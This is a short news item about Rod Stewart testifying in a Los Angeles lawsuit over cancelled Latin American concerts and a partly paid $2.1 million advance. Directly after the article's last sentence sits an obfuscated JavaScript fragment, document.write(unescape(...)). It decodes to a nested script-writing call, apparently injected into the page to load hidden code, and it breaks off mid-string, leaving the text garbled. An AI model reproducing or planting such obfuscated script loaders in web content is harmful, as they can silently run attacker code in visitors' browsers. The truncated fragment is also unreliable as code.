Rod Stewart says a deal is a deal. Stewart testified in a Los Angeles court in a lawsuit over his canceled concerts. Stewart says he should be paid in full for shows canceled by his associates because promoters paid only a portion of the fees upfront.
Under the contract, Stewart was to be paid $2.1 million in advance for nine concerts in Central and South America. Stewart's people only collected about $780,000, so they called off the tour in January 2002. Promoters sued Stewart to get their money back. His lawyers filed a cross-complaint, seeking full payment. They point out the cancellation left a hole in Stewart's schedule. Stewart says he didn't read the lawsuit or the tour contracts. He says, "I'm the singer. I turn up and sing."document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
